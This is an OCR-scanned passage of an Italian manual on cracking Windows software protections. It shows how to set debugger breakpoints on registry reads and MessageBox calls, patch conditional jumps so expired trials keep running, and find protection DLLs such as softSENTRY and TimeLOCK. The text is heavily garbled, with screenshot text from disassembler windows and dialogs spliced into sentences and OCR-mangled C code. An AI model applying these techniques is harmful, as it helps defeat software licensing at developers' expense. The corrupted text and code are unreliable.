capire quali funzioni delle API o quali meccanismi vengono usati per eseguire le 
letture. 

Partiamo dal presupposto che i tempi in cui le protezioni erano fatte con il 
metodo “Chiedi la password, confrontala con xxx, avverti ok o non ok” è finito. 
Le maschere del seguente tipo 

sono comuni e non sono quasi mai 
parti originali del software ma 
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utilizzato dal software per la 
gestione dei dimostrativi adottato 
da software house come ad esempio 
Macromedia, Symantec ecc. 

Il programma visto nella panoramica fatta 
nell'apposito capitolo denominato ProcDump serve a 


21. If you creare dei DUMP decodificati di certi tipi di 

ptions. If sistemi. 

(650) Questi software dispongono di certi costi che spesso 
N sono legati alla singola copia per cui molti 


programmi possiedono delle protezioni più caserecce 

(e meno complesse). 

In ogni caso i tempi del GetDlgItemText è sempre più 
distante per cui è importantissimo individuare il metodo da seguire 
inizialmente, dipendente da alcune cose. 

Spesso capita anche che prima che venga effettivamente attivato un programma ci 
compaia una MessageBox con l’avvertimento di quanti giorni ci rimangono a 
disposizione o addirittura un messaggio in cui veniamo avvisati che il tempo a 
nostra disposizione è scaduto. 

Come dicevo prima questo può avvenire per funzioni incluse nella logica del 
programma, ovvero inserite direttamente dal programmatore originale, o tramite 
programmi di protezione che possono intervenire anche su programmi eseguibili 
già compilati. 

Questi ultimi sono sempre moduli professionali dove le routines di richiesta del 
codice seriale avviene tramite complicati algoritmi che possono essere anche 
collegati a sistemi di registrazione su rete Internet. 

In questi casi le testate dei programmi sono crittografate e il tracing dei 
programmi è abbastanza complesso. 

Molte utilities viste prima servono ad eseguire il dump di tali programmi quali 
ad esempio quelli che usano VBOX. 

Abbiamo appena ricordato PROCDUMP. 

Norton e Macromedia utilizzano spesso questi moduli anche se nelle ultime 
versioni le DLL sono state modificate per by-passare le ormai innumerevoli 
routines generatrici di codice presenti su Internet. 

Ad esempio le funzioni di protezione dei software presenti con prodotti 
Macromedia erano residenti dentro alla DLL rsagnt32.dll (prende il nome dal 
metodo di crittografia RSA). 

Le ultime versioni dispongono delle seguenti dimensioni. 


rsdll.dll 
Uninst.1su 


Tutti i software presenti in Internet per Macromedia con l’ultima versione (la 
prima mostrata) non funzionano piu’. 

Comunque per farla breve vi sarà capitato di chiedervi dove vengono letti i vari 
“12 giorni”, “30 giorni” ecc., ovvero i tempi relativi all’uso di un programma 
timelock. 

Quasi sempre avvengono delle letture dentro al registro alla ricerca di chiavi 
non sempre così chiare come si vorrebbe. 

Leggevo una specie di scritto su Internet che si definiva come “Il manuale 


hacker” in cui c’era un capitolo con delle domande e risposte in cui ne 
compariva una 


“Quando un programma ti avvisa che il 
tempo è scaduto ed esce senza darti la 
possibilità di giungere alla finestra 
To Search Disassembly for Function, Double Click on Test di registrazione come si deve fare ?” 
La risposta 

“Cercate nel file del registro le voci 
i sotto CURRENT_USER/Software relative 
advapi32 RegOpenKeyExk al programma 1n questione e 
Se neo art cancellatele.” 
O Avrebbe potuto anche scrivere 
Giri cip pa “Sperate che ci sia un pulsante per 
cometl32.ImageList_ Destroy resettare i giorni e premetelo.” 
cometl32 ImageList_DragLeave Chi scrive le routine legate alla 


comctl32.ImageList_DragMove 


comctl32.ImageList_DragShowNolock id protezione a tempo non inserisce nel 
registro voci cosi facilmente 

coso; enesesi infraccianità ed in particolare modo 

sotto le voci specifiche del programma 

in questione. 

SoftIce e Wdasm possono servire anche in questo caso. 

Attivateli e cercate d’inserire dei breakpoint nei punti in cui vengono eseguite 

delle chiamate a RegQueryValue ecc. 

Inserite anche qualche breakpoint andando a clickare sulla funzione MessageBox. 

Guardate l'esempio del programma seguente il quale è scaduto. 

Per l’esempio è usato WDASM. 

Dopo averlo caricato richiediamo di aver visualizzate le funzioni importate. 

Subito nelle prime righe risultano le funzioni legate alla gestione del 

registro. 

Facciamo click su quelle legate all’interrogazione e settiamo dei breakpoint 

senza cercare inizialmente di capire se si tratta dei punti che ci interessano a 

noi. 

Attiviamo il programma con F9 ed attendiamo per vedere se si ferma da qualche 

parte. 

Appena il tutto si interromperà verrà visualizzata la finestra in cui compaiono 

anche i parametri passati alla funzione. 

In questa finestra esiste un tasto GET API RESULT che esegue la chiamata e 

ritorna i valori di ritorno dalla funzione. 

I seguenti dati sono quelli catturati dalla finestra (non riporto tutta la 

finestra a causa delle dimensioni). 
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advapi32 RegCloseKey 
advapi32 RegCloseKey 
advapi32 RegCreateKeyExA 


API LONG Arg00 = RegQueryValueExA(Arg01,Arg02, Arg03, Arg04, Arg05, Arg06) 
API Address=00405998, API Return Address=00446B69 


Arg01 = (HKEY) c49ad860->(Z) 

Arg02 = (LPTSTR) 00447d80 -> "Reg" 
Arg03 = (LPDWORD) 00000000 -> 00ca000b 
Arg04 = (LPDWORD) 0069fc4c -> 00000000 
Arg05 = (LPBYTE) 0069fc64 -> ">|" 
Arg06 = (LPDWORD) 0069fc60 -> 00000004 


RESULT for API RegQueryValueExA 


Arg00 = (LONG) 00000002 

Arg01 = (HKEY) c49ad860->(Z) 

Arg02 = (LPTSTR) 00447d80 -> "Reg" 
Arg03 = (LPDWORD) 00000000 -> 00ca000b 
Arg04 = (LPDWORD) 0069fc4c -> 00000000 
Arg05 = (LPBYTE) 0069fc64 -> "° |" 
Arg06 = (LPDWORD) 0069fc60 -> 00000004 


Come vedete uno degli argomenti è “Reg”. 

Proseguiamo con l’esecuzione e controlliamo sempre che nelle vicinanze del 
codice in questione non venga indicata qualche chiamata a funzioni tipo 
MessageBox utilizzate per visualizzare il messaggio di Tempo Scaduto. 


API LONG Arg00 = RegQueryValueExA(Arg01, Arg02, Arg03, Arg04, Arg05, Arg06) 
API Address=00405998, API Return Address=00446B69 


Arg01 = (HKEY) c49ad860->( 
Arg02 = (LPTSTR) 00447d64 -> "Start" 
Arg03 = (LPDWORD) 00000000 -> 00ca000b 
Arg04 = (LPDWORD) 0069fc3c -> 00000000 
Arg05 = (LPBYTE) 0069fc54 -> "%ùi" 
Arg06 = (LPDWORD) 0069fc50 -> 00000008 


RESULT for API RegQueryValueExA 


Arg00 = (LONG) 00000000 

Arg01 = (HKEY) c49ad860->( 

Arg02 = (LPTSTR) 00447d64 -> "Start" 
Arg03 = (LPDWORD) 00000000 -> 00ca000b 
Arg04 = (LPDWORD) 0069fc3c -> 00000003 
Arg05 = (LPBYTE) 0069fc54 -> "" 

Arg06 = (LPDWORD) 0069fc50 -> 00000008 


Poche linee di programma dopo, a seguito di controlli sui valori restituiti da 
quest’ultima chiamata, viene richiamata la funzione MessageBox con il testo 
relativo all'avviso di tempo scaduto. 


API int Arg00 = MessageBoxA(Arg01,Arg02, Arg03, Arg04) 
API Address=004060B8, API Return Address=00447AC8 
Arg01 = (HWND) 00000dic (Window"-------- -------- ") 
Arg02 = (LPCTSTR) 00447d98 -> "Your trial period for -------- ------- has 
expired and the program will no longer functi" 
Arg03 = (LPCTSTR) 00447d84 -> "Expiration Notice" 
Arg04 = (UINT) 00000030 


I vari ----.--.- --.-.---- sono il nome del programma che ho usato come esempio 
che ho cancellato. 

Analizzando il codice prima della chiamata a MessageBox sarà facile trovare 
qualche jne o je che indirizzerà o farà evitare questo punto. 

In questo caso possiamo seguire due vie. 

La prima, la più complessa, ci porterà ad analizzare bene il codice per capire 
quali valori indicano l’avvenuta registrazione. 


In questo caso dovremo adottare 
tecniche di reverse engineering per 


EN URSoft W32Dasm Ver 8.9 Program Disassembler?Debugger BEE riuscire a ricostruire il tutto in 


Disassembler. Project Debug Search Goto Execute Text Functions HexData Fiefs Help modo coretto 


Potremmo anche capire quale codice 


100446FE3 6A00 push 00000000 2] 


a ona indica la registrazione ed andarlo 
100446FR6 56 push esi ad inserire nel registro senza 
100446FE7? SEDS mov ebx, eax . A . n: 
:00446FE9 33C0 xor eax, eax modificare il codice del programma. 
AO OSAFE RDS SO Puso: ape L'altro metodo sarà quello più 
* Referenced by a (U)nconditional or (Clonditional Jump at Address: semplice di modificare il jne in je 
i o viceversa in modo che il programma 
:00446FEC 685F714400 push 0044715F non Si interrompa e ci permetta 
100446FF1 64FF30 push dword ptr fs:[eax] « « A 
1 00446FF4 648920 nov duord ptr fs:[eax], esp almeno di arrivare alla dialog 
100446FF7 SDS55FS lea edx, dword ptr [ebp-08] d , inserimento del codice 
100446FFA SBS3E0010000 mov eax, duord ptr [ebx+000001E0] ,; a 
100447000 ES7FSOFDFF call 0041F084 Se il programma non possiede 
100447005 8B45F8 mov eax, dword ptr [ebp-08] = = LI si i 
100447008 SDSSFC lea edx, dword ptr [ebp-04] limitazioni nella versione demo 
100447008 ESBS00FCFF call 0040708 Pe potremmo al limite non registrarlo. 
100447010 8B45FC mov eax, dword ptr [ebp-04] . « 
RIA FETI E In altre parole il programma si 

c è accorgerà di essere scaduto ma non 


[Line:161370 Pg 1945 of 2056 Code Data @:00446FEC @Offset DOD4GSECh in File:diprintere si interromperà. 
Il programma usato come esempio non 
possiede chiamate a GetDlgItemText 
ecc. per eseguire la lettura del codice di registrazione. 

In ogni caso sbagliando ad inserirlo esegue una chiamata a MessageBox per 
eseguire la segnalazione di codice errato. 

Eseguendo l’intercettazione e ritornando indietro nel codice dove è avvenuta la 
chiamata si giunge ad un punto di partenza dove viene eseguita la preparazione 
del messaggio d’errore. 

Una scritta segnala che la chiamata a quel punto avviene all'indirizzo 00446F72. 
Sicuramente il controllo del codice inserito avverrà da quelle parti per cui 
sarà il caso di andare a vedere all’indirizzo specificato. 

Utilizzando SoftIce avete la possibilità di gestire il backtrace buffer per cui 
arrivati ad un certo punto potreste eseguire lo step by step a ritroso. 

Mentre con WDASM dovete posizionasi su ogni MessageBox con SoftIce potete 
inserire un breakpoint unico relativo a tutti i MessageBox. 


BPX MessageBox 


In alcuni casi le tecniche legate alle routines di registrazione sono ancora più 
nascoste per cui bisogna sperare di potersi affidare ad altri metodi per 
individuarle. 

Trattandosi di programmi Windows esiste tra le risorse la tabella delle 
stringhe. 

WDASM ad esempio possiede un pulsante relativo ad una funzione che mostra le 
stringhe esistenti come risorse. 

In questo caso esistono due possibilità. 

La prima è quella di cercare le stringhe come ad esempio “Grazie per la 
registrazione”, “Codice errato” ecc. 

Guardate la seguente lista. 


"tr$A" 

"TApplication" 

"TextHeight" 

"Thank You for registering!" 
"This is a read-only property, " 
"This program is licensed to:" 
"This program is unregistered." 
"TMMConnectorWindow" 


Come potete vedere una stringa è relativa al ringraziamento per la 
registrazione. 
Eseguendo il click su questo WDASM ci posiziona sul codice che la utilizza. 


La lettura di tali siringhe avviene tramite la funzione API LoadString per cui è 
sempre possibile inserire breakpoint legate a questa funzione. 


user32.LoadStringA 
user32.LoadStringA 
user32.MapVirtualKeyA 
user32.MapWindowPoints 


Dicevo prima che spesso le funzioni di protezione derivano da moduli commerciali 
esterni che vengono agganciati ai file eseguibili. 

In questo caso sicuramente esistono funzioni legate alla gestione della 
protezione inserite in DLL esterne. 

WDASM prevede un flag che blocca il programma tutte le volte che viene letta una 
DLL. 

In ogni caso la prima cosa da fare è quella di analizzare le funzioni importate. 
Generalmente a fianco al nome della funzione c’è quella della DLL de4ntro alla 
quale questa è situata. 


oleaut32.VariantClear 
oleaut32.VariantCopyInd 
SHRLK21.CheckProtectionDLL 
SHRLK21.DoRegistration 
SHRLK21.GetStatus 
SHRLK21.PassHandle 
user32.ActivateKeyboardLayout 
user32.AdjustWindowRectEx 


Nel precedente esempio sono da notare le funzioni DoRegistration dentro alla DLL 
SHRLK21. 

Chiaramente queste funzioni saranno oggetti di controllo. 

In questo caso la cosa alta subito all'occhio ma non sempre è cosi semplice. 
Alcune volte trovate nella directory \windows\system alcune DLL di piccole 
dimensioni che sono appunto collage alle routines di protezione. 

Ad esempio 


:\Windows\SYSTEM\VBOXB40 . DLL 
:\Windows\SYSTEM\VBOXB403 DLL 
:\Windows\SYSTEM\VBOXB410.DLL 
:\Windows\SYSTEM\vboxp40.dll 
:\Windows\SYSTEM\vboxp403.dll 
:\Windows\SYSTEM\vboxp410.dll 
:\Windows\SYSTEM\VBOXT40 .DLL 
:\Windows\SYSTEM\VBOXT403.DLL 
:\Windows\SYSTEM\VBOXT410.DLL 


oNozozezozoZeMee) 


Precedentemente, parlando dei programmi che ci permettono di individuare alcune 
cose legati ai programmi target, avevamo detto che una cosa fondamentale è 
quella di individuare il linguaggio utilizzato. 

Se ad esempio guardando con QuickView ci accorgiamo che il programma utilizza 
una DLL chiamata VB40032.DLL allora sappiamo che il programma è scritto in 
Visual Basic 4 per cui funzioni come GetDlgItemText o GetDlgItemInt non 
serviranno a nulla. 

In Visual Basic potremmo cercare di intercettare funzioni come HMEMCPY. 

Per poter utilizzare un breakpoint basato su questo messaggio dovremo abilitarlo 
e disabilitarlo più volte in particolare modo se utilizziamo SoftIce. 

HMEMCPY probabilmente viene utilizzato in altre funzionalità del programma e non 
solo in corrispondenza della lettura del codice. 

Questo significherebbe, a breakpoint attivato, che la finestra di SoftIce 
continuerebbe a comparire anche in punti da noi non richiesti. 

Vi ricordo che SoftIce può essere attivato anche manualmente in qualsiasi 
momento premendo CTRL-D o i tasti settati. 


In alcuni casi è possibile utilizzare gli identificatori di processo, gli handle 
delle Windows ecc. come selettori da utilizzare come filtri per i vari 
breakpoint. 

Per spiegarmi meglio voglio ricordare che SoftIce mostra il codice e segue tutti 
i processi attivi per cui affidandosi per l’attivazione alla pressione del CTRL- 
D è possibile visualizzare la finestra del codice mentre questo è relativo a 
qualsiasi processo attivo. 

Mettendo un breakpoint su un messaggio generico, WM_INITDIALOG ad esempio, 
interromperemmo l’esecuzione tutte le volte che questo tipo di messaggio 
capiterebbe e non solo relativo alla finestra o al processo da noi voluto. 
Mediante i comandi di visualizzazione informazioni possiamo ricevere le 
informazioni da inserire come filtri. 

Invece di immettere un comando di breakpoint generico 


bmsg WM_INITDIALOG 
potremmo stabilire che il messaggio deve essere relativo alla finestra xxx. 
Bmsg 0FC4 WM_INITDIALOG 


In Windows 2000 esiste la possibilità già da sistema di ricevere certe 
informazioni relative ai processID. 

Dicevo inizialmente che alcuni 
software professionali per la 
creazione di demo inseriscono le 
loro routines dentro a DLL esterne 
al programma. 


£ windows Task Manager i =1DIx| 


File Options Xiew Help 


Applications Processes | Performance | 


Potrebbe anche essere che in prima 
stem le Process : : - . . . . . 
System :00: 24 K istanza non vengono indicati gli usi 
corssuese Di. 00, Frow: di certe funzioni semplicemente 
winlogon.exe 0:0 508 K È 
SOA ro pose perchè queste non sono dentro al 
uotegat nio SE programma caricato con il debugger. 
spoolsv.exe 0:0 sO K Se le DLL vengono collegate al 
‘Tosi 0:0 programma principale tramite una 
Oer er oa DICO SE libreria linkata in fase di linking 
MSTask. 488 00 0:00:00 360 K 1 1 1 1 
perni seo 100 O COTEDO So allora potrebbe verificarsi che il 
Explorer.exe 656 OI 0:00:16 1.712 K debugger analizzando le funzioni 
internat.,exe 704 00 0:00:00 104 K « 
SYMMON.EXE 720 00 0:00:00 188 K importate vedano anche quelle legate 
zmsznt.exe 744 00 0:00:00 154 K I 


alle DLL del programma. 

Ires | Se la DLL viene caricata 
dinamicamente con LoadLibrary o 
funzioni simili il programma 
potrebbe non sapere di avere DLL 
collegate fino al momento 
dell'attivazione dell’istruzione di lettura dinamica della DLL. 

In questo caso bisogna intervenire eseguendo una passata dinamica ovvero una 
fase in cui si cerca con ogni mezzo di sapere quali dll usa il nostro programma. 
Se il pacchetto software al momento dell’installazione mette nella directory del 
programma delle DLL è facile supporre che queste siano usate. 

Le DLL potrebbero essere inserite dal software d’install dentro a 
\windows\system per cui potremmo vedere il loro caricamento solo in modo 
dinamico. 

Esistono programmi, ne abbiamo nominato qualcuno nell’apposito capitolo legato 
ai softwares, che avvisano quando viene caricato un programma o una dll. 
Individuate quali DLL vengono caricate bisogna andare a vedere quali funzioni 
includono per cercare di capire se esiste qualche nome sospetto (anche se è 
difficile). 

Dicevo inizialmente che quasi tutti gli esempi presenti in Internet sono 
relativi a programmi le cui routines di inserimento dei codici sono facilmente 
individuabili grazie alla ricerca della fatidica GetDlgItemText. 

Quando anni fà, 1986, scrissi il mio primo volume sulla programmazione a basso 
livello in C trattai le tecniche in cui si salvavano gli indirizzi di certi 
interrupts e si sostituivano con nostre funzioni. 


(Processes: 26 [ceu Usage: 18% Mem Usage: 76764K # 156720K 4 


Il discorso del metodo di lettura delle funzioni legate alla gestione del 
dimostrativo può avvenire tramite metodi letti dinamicamente tramite 
LoadLibrary. 

Una delle protezioni migliori è chiamata SENTRY32. 

Il seguente spezzone di codice testa le dll di Sentry32. 


// the following block is for testing running an external dll file 
// !!sample program!! testing softSENTRY dll 


#include "stdafx.h" 
#include "windows.h" 


typedef DWORD (CALLBACK *DWLPSSD)(); 


#define UserDef_ReturnValue 12345 /* user can 
change here for selfdefined return value */ 

#ifdef _WIN32 

char *userDef _DblINamePtr = "c:\\trash1\\ssb1132.d11";/* user can change here for 
selfdefined DLL name */ 


#else 


char *userDef _DblINamePtr = "c:\\trash1\\ssb1116.d11";/* user can change here for 
selfdefined DLL name */ 

#endif 

void TestDbllGeneratedBYsoftSENTRY() 


{ 


Cstring mcMsg; 

DWORD retCode = 01; 

char retString[64]; /* for testing, display retCode */ 
HINSTANCE hD1l1 = NULL; 

DWLPSSD lpSSDl1Proc = NULL; 

CWinApp* pApp = NULL; 

hD11 = LoadLibrary(userDef_DllNamePtr); 


if (hD11) { 

1pSSDl1lProc = (DWLPSSD)GetProcAddress(hD11, "softSENTRY"); 
} else { 

AfxMessageBox("LoadLibrary Fail!"); 

return; 


} 

if (!1pSSDl1Proc) { 
AfxMessageBox("GetProcAddress Fail"); 
FreeLibrary (hD11); 
return; 


} 

retCode = (*1pSSsbllProc)(); 

if (hD11) FreeLibrary (hD11); 
_1toa(retCode, retString, 10); 

if (retCode == UserDef_ReturnValue) { 


Proprio in relazione al fatto che spesso i 
moduli di protezione vengono inserite dentro al 


PLENTRY" codice di DLL esterne, leggete bora che nelle 


spiegazioni di Sentry viene detto 


Please ener he pl: information 


pani “As an alternative to injecting protection into 
Compare: your executable file, you can create a DLL 
Serial Number. ] (Dynamic Link Library) with softSENTRY. You will 
need to add code to your program to call the DLL 
a Za and evaluate the return value that it sends.” 
mcMsg = "OK for Trial mode! Return value = "; 


mcMsg += retString; 


} else if (retCode > UserDef _ReturnValue && retCode <= UserDef_ReturnValue 
+10) { 
mcMsg = "OK for Password#"; 
_Iltoa(retCode-UserDef_ReturnValue, retString, 10); 
mcMsg += retString; 
mcMsg += "! Return value = "; 
_ltoa(retCode, retString, 10); 
mcMsg += retString; 
} else { 
mcMsg = "Fail! Return value = "; 
mcMsg += retString; 


} 


AfxMessageBox(mcMsg); /* display retCode */ 
return; 
// !!sample program!! testing softSENTRY dll 


Sotto Windows esistono delle tecniche che vengono definite di subclassing in cui 
certi messaggi o certe funzioni vengono sostituite con nostre funzioni. 

Sia nel caso degli interrupts che in questo caso prima di eseguire le 
sostituzioni venivano salvati gli indirizzi dei vecchi interrupts o funzioni in 
modo tale che dopo aver intercettato i nuovi ed aver controllato se erano 
relativi a casi a noi ideali avrebbero potuto essere chiamate i vecchi servizi. 
L'algoritmo prendeva la forma di 


indirizzo globale vecchio_indirizzo; 


nuova _funzione_xxx 
controlla_se la condizione è... 
se_si esegui fino_a_fine 


fine 
chiama_vecchio_indirizzo 
fine_nuova _funzione_xxx 


salva_in_vecchio_indirizzo_xxx 
inserisci indirizzo _nuova _funzione_in_xxx 


EVENTO CHE FA ESEGUIRE L'INDIRIZZO xxxx 


Per nascondere le funzioni di lettura dei campi relativi ai codici sarebbe 
possibile intercettare ogni singolo messaggio che indica che è stato premuto un 
tasto. 

In pratica invece di fare 


String buffer_codice[20]; 
buffer_codice = LeggiCaratteriInCampoEdit(); 
si potrebbe 


String buffer_codice[20]; 
Int lunghezza = 0; 


void funzione_intercetta_carattere() 
begin 

Char c; 

c = CaratterePremuto(); 

se c == INVIO 


begin 


buffer_codice[lunghezza] = 0; 
else 
buffer_codice[lunghezza] = c; 
++lunghezza; 
end 


end 


SettaFunzioneIntercettaCaratteri(funzione_interceta_carattere); 


In questo modo ogni volta che l’utente preme un tasto viene chiamata la funzione 
che lo inserisce dentro al buffer. 

Controllando se il carattere è 0 si 
capisce se l'utente ha finito 
l'inserimento a seguito di un 
INVIO. 

In questo caso l’intercettazione 
non deve avvenire a seguito di 
GetDlgItemText ecc. 

Per prima cosa possiamo usare Spy+t+ 
cercando di capire quali messaggi 
vengono generati relativi al campo 
d’edit che ci interessa. 

Spy++ possiede un cursore che preso 
con il mouse e posizionato sulla 
finestra che ci interessa fa in 
modo che i messaggi visualizzati 
siano filtrati e relativi a quella 
finestra. 

Tenete sempre presente che Windows 
è un sistema multitasking per cui 
certe procedure potrebbero essere 
inserite come funzioni asincrone 
legate a certi eventi. 

Ricordiamoci che esiste anche la 
possibilità di creare un certo 
numero di TIMER le cui procedure di gestione potrebbero essere adibite a certi 
scopi. 

In questo modo potremmo riassumere la sequenza delle cose da capire. 


INDIVIDUAZIONE LINGUAGGIO 
LOCALIZZAZIONE DELLE FUNZIONI 
MODALITA’ DI ESECUZIONE 


Per la prima e seconda voce possiamo supporre che siano dentro al programma 
principale o dentro a qualche DLL. 
WDASM, lo ricordo, possiede un flag che attiva un breakpoint quando il programma 
abbandona il modulo 
principale e continua 
l'esecuzione dentro a una 
DLL. 
Address: BFF8B537 is in Module: KERNEL32.DLL ADVAPISZ.DLL & Inoltre WDASM ci avvisa 
era aL na dinamicamente in quale DLL 
DIORD: ebd84599, WORD:4589, BYTE:89 COMDLG32.DLL E TURE 8% SAR 
Oper | CODE: mov dword ptr [ebp-28], eax I Proc Create Brk slamo posizionati. a 
Potete osservare i marcatori 


T Proc Exit Brk 
[rr000XyProcess @ Program Entry Point, sip: 0040ed40 Copy] | tara Create Brk DLL Load Brk (BEAKPOINT on 
{rv0012 Loading DLL RERNEL32.DLL @ addr:bf£70000 =] soali Fide DLL LOAD) o addirittura 


quando la DLL viene 
Goto Current Rip I DLL UnLoad Brk scaricata. 


I breakpoints possono essere 


r— Source For Data Disp 2 Active DLLs Conv] 


attivati anche sulla creazione di un thread. 

Un altro metodo per capire se potrebbe esserci l’implicazione di una DLL nelle 

funzioni di lettura dei codici potrebbe essere, in modo semplicistico, quello di 

vedere se durante la sosta sulla dialog di inserimento ci sono DLL lette 

relative a quel processo. 

La seguente maschera mostra la finestra di apertura di un programma, che in 

questo caso indica che il software è scaduto, ma che allo stesso tempo, la 
tipologia del messaggio ovvero come il 
messaggio viene mostrato indica la 


“marca” del software di gestione demo. 


& Rational Rose 98 Enterprise Questo tipo di software viene 


Version Evaluation 


decodificato da ProcDump il quale, oltre 


Copyright © 1991-1998 Rational ad eseguire la decodifica, visualizza 
È anche le dll legate ai moduli letti. 
Your evaluatica period lor Ratonsi Rose 98 has espired. Fer ifeimalica on Quando viene richiesta l’attivazione di 
crceino please cal you: account representative ce 1-800-723-1212. Foe contact È Pes: É 
information ze viwri.iatonal com un programma il quale dopo pochi istanti 


mostra una maschera che avvisa 
dell’avvenuta espirazione del programma 
ed andando a veder quali moduli sono 
collegati risultano evidenti DLL allora 
inizia a “puzzare di bruciato”. 

Questo per dire che è chiaro che dentro 


Trial Expired 


Cancel a quella DLL deve esserci qualche cosa 
legato al controllo del tempo di 
scadenza. 


L'immagine che segue è 
appunto presa da 
ProcDump. 

Notate la DLL 
t132inj.dll. 

Che ci sarà mai di bello 
dentro a quella DLL ? 
Per fare vedere che a 
volte le “prese per i 
fondelli” da parte dei 
creatori delle routine di 
gestione demo è evidente 
guardate un pò i 
contenuti di questa DLL. 
La prima tabella sono i 
dati generali mentre la 


seconda sono le funzioni (2 per la precisione). 


Generat131inj - General informationsRational\t131inj.dll 


Last update : 30/12/97 

File size : 459 264 byte(s) 

Module type : WINDOWS Dynamic links library (32 bits) 
FileDescription : TimeLOCK 3.1 Client 

FileVersion : 3, 1, 2,4 

CompanyName : Preview Software, Inc. 

LegalCopyright : Copyright © 1997 Preview Software, Inc. 
InternalName : TimeLOCK 3.1 Client 

ProductName : TimeLOCK 3.1 

ProductVersion : 3, 1, 24 

Module in use : 0 times 


Ed ora le due funzioni 


Exportt131inj - Exported functionsRational\t131inj.dll 


0 ?DoNotWasteTime _MrCracker@@YGHPBDPBEIPAEPAI@Z 
1 ?PleaseTraceIntoMe_MrCracker@@YGKKKPAEPAXKK@Z 


Una funzione che si chiama : PleaseTraceIntoMe_MrCracker è proprio un nome una 
garanzia !! 

Dopo aver letto un nome così ti verrebbe quasi da pensare che se provi a fare il 
trace ti scoppia il computer in faccia ! 

Solo capendo dove vengono lette le informazioni di quanto è stato attivo il 
software si possono creare routine che funzionerebbero come le ricariche 
telefoniche. 

Ho trovato in giro un crack relativo a ZipMagic che ogni volta che lo lanci ti 
mette a 60 giorni il tempo a disposizione. 

Molte volte si tratta di andare a scrivere un numero in qualche parte del 
registro. 

ScanBin mostra anche in relazione ad un programma quali DLL vengono chiamate 
direttamente e quali indirettamente. 


DLL used : c:\Windows\VBRUN300 .DLL 


= c:\Windows\SYSTEM\GDI.EXE 

= c:\Windows\SYSTEM\KRNL386 .EXE 
KEYBOARD = c:\Windows\SYSTEM\KEYBOARD .DRV 
USER = c:\Windows\SYSTEM\USER. EXE 
WIN87EM = c:\Windows\SYSTEM\WIN87EM.DLL 


Undirect calls 


COMM = c:\Windows\SYSTEM\COMM .DRV 
DDEML = c:\Windows\SYSTEM\DDEML .DLL 
MOUSE = c:\Windows\SYSTEM\LMOUSE .DRV 
SYSTEM = c:\Windows\SYSTEM\SYSTEM.DRV 


La seconda voce era relativa all’identificazione del metodo usato per la lettura 
dei codici. 

Ho detto prima che moltissimi scritti legati a “come sproteggere xxxx” sono 
tutti relativi a programmi che usano GetDlgItemText per la lettura dei serial 
number. 

Bisogna ricordarsi che il non utilizzo di queste funzioni non dipende solo 
dealla furbizia del programmatore a non usarle, al fine di non fare identificare 
le funzioni di protezione tanto semplicemente, ma dipende anche dal linguaggio 
usato per la scrittura del programma. 

GetDlgItemText è un API del C per cui altri linguaggi non dispongono di questo 
identificatore di funzione (magari hanno funzioni proprie che eseguono scopi 
uguali o simili). 

Esiste VisualBasic, Delphi ecc. 

In questi casi bisogna sapere quali sono le funzioni proprie del linguaggio che 
eseguono la lettura di dati da un campo di edit inserito dentro ad una dialog. 
Ad esempio precedentemente ho detto che potrebbe essere usata funzione 
MessageBox relativa alla visualizzazione del messaggio “Codice errato” per 
identificare il punto dove viene controllato il codice inserito. 

Se il programma è scritto in C la funzione è appunto MessageBox. 

In caso di un programma Delphi la funzione si chiama 


ShowMessage(Const Msg: String); 
Questa in Delphi crea una Dialog con il testo specificato come argomento con un 
pulsante per proseguire. 


Finestre di dialog un po più complesse possono essere create in Delphi con 


function MessageDlg(...); 


Inoltre DELPHI possiede delle funzioni idonee alla presentazone di una dialog 
destinata all’input di valori. 
Questa funzione è 


function InputBox(...); 
function InputQuery(...); 


Ricordatevi che comunque possono essere alla fine utilizzate le API di Windows. 
In pratica potreste accorgervi che un programma è scritto in VisualBasic e che 
quindi questo può utilizzare certe funzioni inserite dentro alla DLL di Run Time 
di VB. 

Supponiamo che il programma in questione usi certe funzioni di Run Time di VB 
3.0. 

Se andiamo a vedere le funzioni importate dal modulo di VB ovvero VB400.dl1l o 
similia vedremmo 


Imported functions : c:\Windows\VBRUN300 .DLL 


GDI 1 SETBKCOLOR GDI 15 OFFSETWINDOWORG 
GDI 2 SETBKMODE GDI 19 LINETO 

GDI 3 SETMAPMODE GDI 20 MOVETO 

GDI 4 SETROP2 GDI 21 EXCLUDECLIPRECT 
GDI 7 SETSTRETCHBLTMODE GDI 22 INTERSECTCLIPRECT 
GDI 9 SETTEXTCOLOR GDI 23 ARC 

GDI 11 SETWINDOWORG GDI 24 ELLIPSE 

GDI 13 SETVIEWPORTORG GDI 26 PIE 

GDI 14 SETVIEWPORTEXT GDI 27 RECTANGLE 


Come potete vedere l’immagine creata da ScanBin mostra che la DLL VBRUN300 di 
VisualBasic 3.0 importa da GDI le funzioni SetBKColor ecc. 

Comunque il problema di individuare il metodo di lettura è relativo 
all’individuazione delle funzioni usate per la lettura dei codici oppure 
all’identificazione del metodo. 

In questo caso bisognerà andare a vedere i messaggi gestiti visto che quasi 
sicuramente le letture avverranno da funzioni utilizzante come windows procedure 
per i campi di edit. 

Chi fa programmazione in ambiente Windows conosce il termine della Windows 
Procedure. 

In pratica quando un finestra viene creata gli viene abbinata una funzione a 
cui normalmente vengono indirizzati i messaggi relativi a questa. 

Usando il vecchio e caro C nella Windows Procedure veniva inserito un CASE che 
serviva ad individuare il messaggio. 

La funzione di gestione riceveva tre parametri tra cui l’handle della finestra 
relativa la messaggio e due parametri che venivano usati per vari scopi a 
seconda del tipo di messaggio. 

WDASM permette di inserire breakpoint automatici in relazione alle chiamate a 
delle funzioni. 

Un pulsante presente nella maschera che indicava l’avvenuta chiamata a tali 
funzioni permetteva di eseguirla e di visualizzare i dati di ritorno. 

SoftIce quando si richiede la visualizzazione delle finestre mostra, oltre 
all’handle anche l’indirizzo della Window Procedure. 

Per mostrare praticamente come avviene la creazione di una dialog e 
l’abbinamento di una Window Procedure riporto le seguenti linee in C. 

In questa funzione viene creata un istanza relativa alla funzione che dovrà 
ricevere i messaggi della window. 


int BLD_NOMEFORClicked104DlgFuncDef(HWND hwnd,char *szDlgName) 
{ 
DLGPROC lpProc; 
int ReturnValue; 
lpProc = (DLGPROC)MakeProcInstance((FARPROC)windows_procedure, hInst); 
ReturnValue = DialogBox(hInst,(LPSTR)(szDlgName?szDlgName:"FORMEDIT"), 


hwnd, lpProc); 


// Resto del codice 
} 


Quella che segue è la vera e propria window procedure dentro alla quale grazie 
ad un Case è possibile individuare la tipologia dei messaggi. 


BOOL BLD_CALLBACK window _procedure(HWND hDlg,UINT message, WPARAM wParam, LPARAM 


lParam) 
{ 
